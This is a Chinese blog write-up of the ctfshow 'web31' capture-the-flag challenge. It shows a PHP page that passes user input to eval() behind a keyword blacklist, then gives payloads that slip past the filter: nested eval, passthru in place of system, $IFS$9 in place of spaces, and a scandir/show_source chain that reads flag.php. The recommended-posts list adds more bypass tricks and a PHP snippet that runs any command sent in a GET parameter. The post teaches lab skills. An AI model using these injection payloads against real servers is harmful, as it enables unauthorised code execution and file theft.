ctfshow-web入门-web31

最新推荐文章于 2025-04-09 11:05:19 发布
最新推荐文章于 2025-04-09 11:05:19 发布
阅读量576 收藏 5
点赞数 3
分类专栏: ctfshow 文章标签: 1024程序员节 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74167420/article/details/143219832
版权 
<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

1、该题目过滤了满足正则匹配的字符串,但是由于只是对参数进行了过滤,所以可以利用嵌套的方法来进行绕过:

?c=eval($_GET[a]);&a=system('cat flag.php');

也可利用passthru()函数来代替system函数。

?c=eval($_GET[a]);&a=passthru('cat flag.php');

这里的 cat 命令也可被 tac 命令替换。

2、因为passthru函数没有被过滤,所以可以直接使用passthru函数,但是由于空格被过滤,因此可以使用$IFS$9代替空格,$IFS$9的介绍可以参考以下博客:

浅谈CTF中命令执行与绕过的小技巧_$ifs$9-优快云博客

使用$9,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。

在php环境中%09也可以代替空格符号。

?c=passthru("tac\$IFS$9f*");

这里不能使用cat命令,因为是给c变量传参。

3、使用连续调用函数的方法,实现对flag的输出。

localeconv()函数可以返回一个小数点 和数组,小数点位于数组的第一位。

pos()函数输出数组的第一位,即输出小数点。

scandir()函数,扫描目录,由于 . 代表当前目录,所以会扫描当前目录中的文件。

使用array_reverse()函数,颠倒查询到的目录下的文件的位置,即将flag.php文件移动到第二个位置。

利用next()函数,读取第二个位置的文件。

show_source();输出源码

所以最终payload的为:

?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 1039
ctfshow,命令执行,web31
CTFshow 命令执行 web31
Kradress的博客
10-29 337
查看源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:49:10 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']
CTFSHOW web入门——web31
m0_74093152的博客
04-23 304
过滤了flag、system、php、cat、sort、shell、\. 、空格。因此构造payload:?
[ctfshow web入门] web31
最新发布
qq_50332504的博客
04-09 381
可以看到,过滤的东西更多了。
Ctfshow web-web31
qq_45427131的博客
05-16 387
首先查看源代码,还是preg_match函数,这次过滤了 flag|system|php|cat|sort|shell|.| |’ 这次过滤了以上函数 多了对单引号的过滤,单引号的过滤是小问题,因为 <?php eval($_POST['a']);?>中单引号是可有可无的 <?php eval($_POST['a']);?> = <?php eval($_POST[a]);?> 而对于system的过滤,则可以用其他php的命令执行函数代替,比如passthru 构造
CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 1258
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
CTFShow-WEB入门--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 1115
F12。
最新CTFShow-WEB入门--信息搜集详细Wp_ctfshow web,2024年最新看这篇文章就行了
2401_84264244的博客
05-13 1043
index.phps。
【CTF-WEB基础】ctfshow-web入门-257—反序列化
yu_fly_fish的博客
08-14 243
一起加油!
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1267
ctfshow-web入门-爆破wp
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 467
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
ctfshow-web31(命令执行)
m0_62094846的博客
01-21 577
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:49:10 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){..
CTFshow命令执行31
a861511690的博客
06-11 199
error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 显然对空格单引号都进行了过滤,命令执行有四个函数我们可以使用passthru() 并将’ '替换为"
ctfshow web入门 命令执行部分(29-31
羽的博客
09-05 2356
大佬请自行忽略讲解部分,讲解针对新手。知识点源自payload的构造。大部分flag需要右键查看源码获得 29 知识点:通配符 payload:c=system('cat f*'); 在linux系统中 有一些通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符(0个或多个) ls file * ? 匹配任何一个字符(不在括号内时)?代表任意1个字符 ls file 0 [abcd] 匹配abcd中任何一个字符 [a-z] 表示范围a到z,表示范围的意思 []匹配中括号中任意一个字符 ls fil
CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1809
CTFshow 命令执行 web29 web30 web31
Ctfshow Web入门 命令执行 Web31-74
qq_45427131的博客
10-21 3010
CtfShow Web入门-命令执行 感谢Y4师傅!看Y4的Wp真的学到好多! Web31 过滤条件: flag\system\php\cat\sort\shell\小数点\空格\单引号 执行passthru()查看flag 绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq 绕过空格用%09 <> ${IFS} $IFS$9 {cat,fl*} %20 flag绕过可以用通符代替 执行echo查看flag echo
ctfshow web入门 命令执行29-33
m0_62207170的博客
03-24 713
ctfshow web入门 命令执行29-33
ctfshow web入门(SSRF)
Blazing-Angel的博客
07-19 1141
ctfshow
ctfshow-web入门-命令执行(web30-web36)
Welcome To Myon'Blog !
06-06 1469
命令执行,需要严格的过滤。
ctfshow-web入门
01-19
### CTFShow Web 入门教程与资源 #### 图片中的隐藏后门代码 在处理CTF挑战时,有时会遇到图片中嵌入的恶意代码或后门。这类攻击通常利用图像文件格式的特点,在不影响视觉效果的前提下植入可执行代码。为了检测此类漏洞,可以使用工具如Wireshark抓包分析网络传输数据,或者通过十六进制编辑器(例如010 Editor)查看二进制内容[^1]。 ```bash # 使用010Editor打开可疑图片文件并查找异常字符序列 $ 010editor image.png ``` #### 构造命令执行Payload 对于存在命令注入风险的应用程序,可以通过精心设计输入参数来触发特定行为。比如在一个假设场景下,如果服务器端未对用户提交的数据做充分验证,则可能允许攻击者绕过安全机制执行任意指令。下面展示了如何构建用于测试目的的有效载荷: ```php <?php // 测试用PHP代码片段模拟远程命令执行 $c = $_GET['c']; exec($c, $output); echo implode("\n", $output); ?> ``` 实际操作时应谨慎对待任何涉及系统调用的功能,并确保只针对授权环境开展实验性活动[^2]。 #### PHP随机数生成函数反向工程 某些情况下,了解目标应用内部工作原理有助于找到解决方案路径。以PHP为例,其内置伪随机数发生器`mt_rand()`依赖于初始状态——即种子值。当知道部分输出结果时,可通过逆向工程技术恢复原始种子,进而预测后续产生的数值系列。开源项目提供了实现这一过程所需的算法和编译方法[^3]。 ```cpp #include "php_mt_seed.h" int main() { // 示例:基于已知MT输出还原种子 unsigned long mt_output[] = { /* 已知的一组连续输出 */ }; int seed; find_mt_seed(mt_output, sizeof(mt_output)/sizeof(*mt_output), &seed); printf("Recovered Seed: %d\n", seed); return 0; } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值